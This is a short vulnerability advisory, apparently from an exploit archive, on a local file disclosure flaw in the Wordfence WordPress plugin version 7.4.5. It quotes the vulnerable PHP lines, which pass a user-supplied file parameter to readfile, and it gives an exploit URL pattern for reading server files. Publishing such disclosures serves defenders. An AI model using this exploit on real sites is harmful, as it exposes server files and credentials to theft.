Wordpress Plugin wordfence.7.4.5 - Local File Disclosure

2020.02.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure [-] Author: mehran feizi [-] Category: webapps [-] Date: 2020.02.12 ============================================================================== Vulnerable Source: 5662: readfile readfile($localFile); 5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file'])); ================================================================================= Exploit: localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD] ================================================================================= contact me: telegram: @MF0584 gmail: mehranfeizi13841384@gmail.com


Vote for this issue:
100%
0%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top